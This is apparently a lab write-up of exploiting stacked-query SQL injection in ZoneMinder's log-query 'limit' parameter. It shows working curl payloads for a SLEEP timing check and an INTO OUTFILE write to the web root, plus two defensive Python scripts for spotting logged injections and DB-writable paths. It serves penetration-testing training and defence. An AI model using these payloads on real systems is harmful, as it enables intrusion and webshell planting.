SQL injection


The target ZoneMinder instance is suspected to suffer from multiple vulnerabilities, including SQL injection.

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/pebbles]
└─$ searchsploit -x php/webapps/41239.txt
  Exploit: Zoneminder 1.29/1.30 - Cross-Site Scripting / SQL Injection / Session Fixation / Cross-Site Request Forgery
      URL: https://www.exploit-db.com/exploits/41239
     Path: /usr/share/exploitdb/exploits/php/webapps/41239.txt
    Codes: N/A
 Verified: False
File Type: HTML document, ASCII text
 
Source: https://www.foxmole.com/advisories/foxmole-2016-07-05.txt
 
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
 
=== FOXMOLE - Security Advisory 2016-07-05 ===
 
Zoneminder multiple vulnerabilities
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
Affected Versions
=================
Zoneminder 1.29,1.30
 
Issue Overview
==============
Vulnerability Type: SQL Injection, Cross Site Scripting, Session Fixation, No CSRF Protection
Technical Risk: high
Likelihood of Exploitation: medium
Vendor: Zoneminder
Vendor URL: https://zoneminder.com/
Credits: FOXMOLE employee Tim Herres
Advisory URL: https://www.foxmole.com/advisories/foxmole-2016-07-05.txt
Advisory Status: Public
CVE-Number: NA
CVE URL: NA
OVE-ID:
OVI-ID:
CWE-ID: CWE-89
CVSS 2.0: 4.3 (AV:N/AC:M/Au:N/C:P/I:N/A:N)
 
[...REDACTED...]
 
2)SQL Injection
Example Url:http://192.168.241.131/zm/index.php
Parameter: limit (POST)
    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
    Payload: view=request&request=log&task=query&limit=100;(SELECT *
FROM (SELECT(SLEEP(5)))OQkj)#&minTime=1466674406.084434
Easy exploitable using sqlmap.

The PoC in the advisory shows a stacked-query SQLi. The vulnerable parameter is limit (POST) of the index.php log-query request.

Confirmation


┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/pebbles]
└─$ sqli=$(echo '; SELECT SLEEP(5) -- -' | jq -sRr @uri) ; time curl -s -x http://localhost:8080 -i -X POST http://$IP/zm/index.php -H 'Content-type: application/x-www-form-urlencoded' -d "view=request&request=log&task=query&limit=100$sqli"     
HTTP/1.1 200 OK
Date: Tue, 11 Mar 2025 20:12:07 GMT
Server: Apache/2.4.18 (Ubuntu)
Set-Cookie: ZMSESSID=htij1ciu1mrevms876l9f8gnl5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: zmSkin=classic; expires=Thu, 18-Jan-2035 20:12:07 GMT; Max-Age=311040000
Set-Cookie: zmCSS=classic; expires=Thu, 18-Jan-2035 20:12:07 GMT; Max-Age=311040000
Vary: Accept-Encoding
Content-Length: 3631
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/plain;charset=UTF-8
 
{"result":"Ok","updated":"Tue 11th Mar, 4:12pm","total":"14","available":"14","logs":[{"TimeKey":"1738224236.700230","Component":"zmaudit","ServerId":null,"Pid":"1408","Level":"0","Code":"INF","Message":"Deleted 194 log table entries by time","File":"zmaudit.pl","Line":null,"DateTime":"2025-01-30 03:03:56.700230","Server":""},{"TimeKey":"1738223336.781070","Component":"zmwatch","ServerId":null,"Pid":"1437","Level":"0","Code":"INF","Message":"Watchdog pausing for 30 seconds","File":"zmwatch.pl","Line":null,"DateTime":"2025-01-30 02:48:56.781070","Server":""},{"TimeKey":"1738223336.774410","Component":"zmwatch","ServerId":null,"Pid":"1437","Level":"0","Code":"INF","Message":"Watchdog starting","File":"zmwatch.pl","Line":null,"DateTime":"2025-01-30 02:48:56.774410","Server":""},{"TimeKey":"1738223336.660190","Component":"zmdc","ServerId":null,"Pid":"1437","Level":"0","Code":"INF","Message":"'zmwatch.pl' started at 25\/01\/30 02:48:56","File":"zmdc.pl","Line":null,"DateTime":"2025-01-30 02:48:56.660190","Server":""},{"TimeKey":"1738223336.659130","Component":"zmdc","ServerId":null,"Pid":"1376","Level":"0","Code":"INF","Message":"'zmwatch.pl' starting at 25\/01\/30 02:48:56, pid = 1437","File":"zmdc.pl","Line":null,"DateTime":"2025-01-30 02:48:56.659130","Server":""},{"TimeKey":"1738223336.291950","Component":"zmfilter","ServerId":null,"Pid":"1403","Level":"0","Code":"INF","Message":"Scanning for events","File":"zmfilter.pl","Line":null,"DateTime":"2025-01-30 02:48:56.291950","Server":""},{"TimeKey":"1738223335.648340","Component":"zmdc","ServerId":null,"Pid":"1408","Level":"0","Code":"INF","Message":"'zmaudit.pl -c' started at 25\/01\/30 02:48:55","File":"zmdc.pl","Line":null,"DateTime":"2025-01-30 02:48:55.648340","Server":""},{"TimeKey":"1738223335.647160","Component":"zmdc","ServerId":null,"Pid":"1376","Level":"0","Code":"INF","Message":"'zmaudit.pl -c' starting at 25\/01\/30 02:48:55, pid = 1408","File":"zmdc.pl","Line":null,"DateTime":"2025-01-30 02:48:55.647160","Server":""},{"TimeKey":"1738223335.433430","Component":"zmdc","ServerId":null,"Pid":"1403","Level":"0","Code":"INF","Message":"'zmfilter.pl' started at 25\/01\/30 02:48:55","File":"zmdc.pl","Line":null,"DateTime":"2025-01-30 02:48:55.433430","Server":""},{"TimeKey":"1738223335.430490","Component":"zmdc","ServerId":null,"Pid":"1376","Level":"0","Code":"INF","Message":"'zmfilter.pl' starting at 25\/01\/30 02:48:55, pid = 1403","File":"zmdc.pl","Line":null,"DateTime":"2025-01-30 02:48:55.430490","Server":""},{"TimeKey":"1738223335.325330","Component":"zmpkg","ServerId":null,"Pid":"1351","Level":"0","Code":"INF","Message":"Starting up services","File":"zmpkg.pl","Line":null,"DateTime":"2025-01-30 02:48:55.325330","Server":""},{"TimeKey":"1738223332.321970","Component":"zmdc","ServerId":null,"Pid":"1376","Level":"0","Code":"INF","Message":"Server starting at 25\/01\/30 02:48:52","File":"zmdc.pl","Line":null,"DateTime":"2025-01-30 02:48:52.321970","Server":""},{"TimeKey":"1738223331.958250","Component":"zmpkg","ServerId":null,"Pid":"1351","Level":"0","Code":"INF","Message":"Command: start","File":"zmpkg.pl","Line":null,"DateTime":"2025-01-30 02:48:51.958250","Server":""},{"TimeKey":"1738223331.912560","Component":"zmpkg","ServerId":null,"Pid":"1351","Level":"0","Code":"INF","Message":"Sanity checking States table...","File":"zmpkg.pl","Line":null,"DateTime":"2025-01-30 02:48:51.912560","Server":""}],"state":"ok","options":{"Component":["zmaudit","zmdc","zmfilter","zmpkg","zmwatch"],"Pid":["1351","1376","1403","1408","1437"],"Level":["INF"],"File":["zmaudit.pl","zmdc.pl","zmfilter.pl","zmpkg.pl","zmwatch.pl"]}}
real	5.17s
user	0.01s
sys	0.00s
cpu	0%

Testing the PoC query confirms the vulnerability: the web app took about 5 seconds (real 5.17s) to respond, matching the injected SLEEP(5).

Blind Time-based SQLi


┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/pebbles]
└─$ sqli=$(echo '; SELECT @@version -- -' | jq -sRr @uri) ; time curl -s -x http://localhost:8080 -i -X POST http://$IP/zm/index.php -H 'Content-type: application/x-www-form-urlencoded' -d "view=request&request=log&task=query&limit=100$sqli"
HTTP/1.1 200 OK
Date: Tue, 11 Mar 2025 20:14:17 GMT
Server: Apache/2.4.18 (Ubuntu)
Set-Cookie: ZMSESSID=1a9h4u4okaegli2i4l76hes2d0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: zmSkin=classic; expires=Thu, 18-Jan-2035 20:14:17 GMT; Max-Age=311040000
Set-Cookie: zmCSS=classic; expires=Thu, 18-Jan-2035 20:14:17 GMT; Max-Age=311040000
Vary: Accept-Encoding
Content-Length: 4025
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/plain;charset=UTF-8
 
{"result":"Ok","updated":"Tue 11th Mar, 4:14pm","total":"15","available":"15","logs":[{"TimeKey":"1741723992.059738","Component":"web_js","ServerId":null,"Pid":"1302","Level":"-2","Code":"ERR","Message":"TypeError: popup is null","File":"http:\/\/192.168.209.52:8080\/zm\/skins\/classic\/js\/skin.js","Line":"117","DateTime":"2025-03-11 16:13:12.059738","Server":""},{"TimeKey":"1738224236.700230","Component":"zmaudit","ServerId":null,"Pid":"1408","Level":"0","Code":"INF","Message":"Deleted 194 log table entries by time","File":"zmaudit.pl","Line":null,"DateTime":"2025-01-30 03:03:56.700230","Server":""},{"TimeKey":"1738223336.781070","Component":"zmwatch","ServerId":null,"Pid":"1437","Level":"0","Code":"INF","Message":"Watchdog pausing for 30 seconds","File":"zmwatch.pl","Line":null,"DateTime":"2025-01-30 02:48:56.781070","Server":""},{"TimeKey":"1738223336.774410","Component":"zmwatch","ServerId":null,"Pid":"1437","Level":"0","Code":"INF","Message":"Watchdog starting","File":"zmwatch.pl","Line":null,"DateTime":"2025-01-30 02:48:56.774410","Server":""},{"TimeKey":"1738223336.660190","Component":"zmdc","ServerId":null,"Pid":"1437","Level":"0","Code":"INF","Message":"'zmwatch.pl' started at 25\/01\/30 02:48:56","File":"zmdc.pl","Line":null,"DateTime":"2025-01-30 02:48:56.660190","Server":""},{"TimeKey":"1738223336.659130","Component":"zmdc","ServerId":null,"Pid":"1376","Level":"0","Code":"INF","Message":"'zmwatch.pl' starting at 25\/01\/30 02:48:56, pid = 1437","File":"zmdc.pl","Line":null,"DateTime":"2025-01-30 02:48:56.659130","Server":""},{"TimeKey":"1738223336.291950","Component":"zmfilter","ServerId":null,"Pid":"1403","Level":"0","Code":"INF","Message":"Scanning for events","File":"zmfilter.pl","Line":null,"DateTime":"2025-01-30 02:48:56.291950","Server":""},{"TimeKey":"1738223335.648340","Component":"zmdc","ServerId":null,"Pid":"1408","Level":"0","Code":"INF","Message":"'zmaudit.pl -c' started at 25\/01\/30 02:48:55","File":"zmdc.pl","Line":null,"DateTime":"2025-01-30 02:48:55.648340","Server":""},{"TimeKey":"1738223335.647160","Component":"zmdc","ServerId":null,"Pid":"1376","Level":"0","Code":"INF","Message":"'zmaudit.pl -c' starting at 25\/01\/30 02:48:55, pid = 1408","File":"zmdc.pl","Line":null,"DateTime":"2025-01-30 02:48:55.647160","Server":""},{"TimeKey":"1738223335.433430","Component":"zmdc","ServerId":null,"Pid":"1403","Level":"0","Code":"INF","Message":"'zmfilter.pl' started at 25\/01\/30 02:48:55","File":"zmdc.pl","Line":null,"DateTime":"2025-01-30 02:48:55.433430","Server":""},{"TimeKey":"1738223335.430490","Component":"zmdc","ServerId":null,"Pid":"1376","Level":"0","Code":"INF","Message":"'zmfilter.pl' starting at 25\/01\/30 02:48:55, pid = 1403","File":"zmdc.pl","Line":null,"DateTime":"2025-01-30 02:48:55.430490","Server":""},{"TimeKey":"1738223335.325330","Component":"zmpkg","ServerId":null,"Pid":"1351","Level":"0","Code":"INF","Message":"Starting up services","File":"zmpkg.pl","Line":null,"DateTime":"2025-01-30 02:48:55.325330","Server":""},{"TimeKey":"1738223332.321970","Component":"zmdc","ServerId":null,"Pid":"1376","Level":"0","Code":"INF","Message":"Server starting at 25\/01\/30 02:48:52","File":"zmdc.pl","Line":null,"DateTime":"2025-01-30 02:48:52.321970","Server":""},{"TimeKey":"1738223331.958250","Component":"zmpkg","ServerId":null,"Pid":"1351","Level":"0","Code":"INF","Message":"Command: start","File":"zmpkg.pl","Line":null,"DateTime":"2025-01-30 02:48:51.958250","Server":""},{"TimeKey":"1738223331.912560","Component":"zmpkg","ServerId":null,"Pid":"1351","Level":"0","Code":"INF","Message":"Sanity checking States table...","File":"zmpkg.pl","Line":null,"DateTime":"2025-01-30 02:48:51.912560","Server":""}],"state":"alert","options":{"Component":["web_js","zmaudit","zmdc","zmfilter","zmpkg","zmwatch"],"Pid":["1302","1351","1376","1403","1408","1437"],"Level":{"-2":"ERR","0":"INF"},"File":["http:\/\/192.168.209.52:8080\/zm\/skins\/classic\/js\/skin.js","zmaudit.pl","zmdc.pl","zmfilter.pl","zmpkg.pl","zmwatch.pl"],"Line":["117"]}}
real	0.05s
user	0.00s
sys	0.01s
cpu	11%

Attempting to enumerate the version information failed: the response came back in 0.05s and contains no output from the injected SELECT. This is likely a blind SQL injection only.

Data Leak


Manually invoking an error reveals that the backend database is MySQL.

Web Root Directory


Sending a normal query now reveals all the logged SQL injection attempts, which leak the web root directory: /usr/share/zoneminder/www
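Since the log table records failed statements, the same log-query response is also a detection source for the defender. The following is an added example, not part of the original write-up: it parses a response in the JSON shape shown above and flags entries whose Message carries the payload classes used on this page (stacked queries, SLEEP probes, INTO OUTFILE). The "web_php" component name and the error-entry wording are constructed assumptions.

```python
import json
import re

# Payload classes seen in this write-up, each with a label for the report.
INDICATORS = [
    ("stacked query", re.compile(r";\s*(SELECT|INSERT|UPDATE|DELETE|DROP)\b", re.I)),
    ("time-based probe", re.compile(r"\bSLEEP\s*\(", re.I)),
    ("file write", re.compile(r"\bINTO\s+(OUTFILE|DUMPFILE)\b", re.I)),
    ("comment truncation", re.compile(r"--\s|/\*")),
]


def find_injection_attempts(response_text):
    """Parse a ZoneMinder log-query response (the JSON shape shown on this page)
    and return the log entries whose Message matches an injection indicator."""
    data = json.loads(response_text)
    hits = []
    for entry in data.get("logs", []):
        msg = entry.get("Message") or ""
        kinds = [label for label, rx in INDICATORS if rx.search(msg)]
        if kinds:
            hits.append({"when": entry.get("DateTime"),
                         "component": entry.get("Component"), "kinds": kinds})
    return hits


# Constructed sample: two benign entries copied in shape from the page, plus two
# constructed "web_php" error entries standing in for logged failed statements.
SAMPLE_RESPONSE = json.dumps({"result": "Ok", "logs": [
    {"Component": "zmaudit", "Code": "INF", "Message": "Deleted 194 log table entries by time",
     "DateTime": "2025-01-30 03:03:56.700230"},
    {"Component": "web_js", "Code": "ERR", "Message": "TypeError: popup is null",
     "DateTime": "2025-03-11 16:13:12.059738"},
    {"Component": "web_php", "Code": "ERR", "DateTime": "2025-03-11 16:12:07.000000",
     "Message": "SQL-ERR 'You have an error in your SQL syntax', statement was "
                "'SELECT * FROM Logs LIMIT 100; SELECT SLEEP(5) -- -'"},
    {"Component": "web_php", "Code": "ERR", "DateTime": "2025-03-11 16:20:41.000000",
     "Message": "SQL-ERR 'Access denied', statement was 'SELECT * FROM Logs LIMIT 100; "
                "SELECT \"SQLi\" INTO OUTFILE \"/usr/share/zoneminder/www/test\" -- -'"},
]})

if __name__ == "__main__":
    for hit in find_injection_attempts(SAMPLE_RESPONSE):
        print(hit["when"], hit["component"], ", ".join(hit["kinds"]))
```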

Write Access


┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/pebbles]
└─$ sqli=$(echo '; SELECT "SQLi" INTO OUTFILE "/usr/share/zoneminder/www/test" -- -' | jq -sRr @uri) ; curl -s -i -X POST http://$IP/zm/index.php -H 'Content-type: application/x-www-form-urlencoded' -d "view=request&request=log&task=query&limit=100$sqli"                  

Testing write access to the web root directory.

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/pebbles]
└─$ curl http://$IP/zm/test    
SQLi

Confirmed. I can move on to writing a PHP webshell.
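The write primitive above only works because the database process can create files inside the web root. As an added defender-side check, not part of the original write-up, the script below walks a web root and lists every directory or file the DB service account could write to; the web root path, the "mysql" account and the sample directory used in the comments are assumptions.

```python
import os
import stat


def writable_by(st, uid, gids):
    """True if a principal with this uid and group set may write the inode,
    evaluated owner, then group, then 'other' bits, as the kernel does."""
    mode = st.st_mode
    if st.st_uid == uid:
        return bool(mode & stat.S_IWUSR)
    if st.st_gid in gids:
        return bool(mode & stat.S_IWGRP)
    return bool(mode & stat.S_IWOTH)


def db_writable_paths(webroot, db_uid, db_gids):
    """Return paths under webroot that the DB service account could write.
    A writable directory is what lets INTO OUTFILE create a new file in a
    web-served path; existing files are checked too so that a world-writable
    script is not missed. Symlinks are skipped rather than followed."""
    hits = []
    for dirpath, _dirs, files in os.walk(webroot):
        for path in [dirpath] + [os.path.join(dirpath, f) for f in files]:
            st = os.lstat(path)
            if stat.S_ISLNK(st.st_mode):
                continue
            if writable_by(st, db_uid, db_gids):
                hits.append(path)
    return hits


if __name__ == "__main__":
    import pwd
    # Assumed values: the Debian/Ubuntu "mysql" account and the web root leaked above.
    db = pwd.getpwnam("mysql")
    for p in db_writable_paths("/usr/share/zoneminder/www", db.pw_uid, {db.pw_gid}):
        print("DB account can write:", p)
```

This covers the filesystem side only; on the database side the matching controls are MySQL's secure_file_priv setting and not granting the application user the FILE privilege.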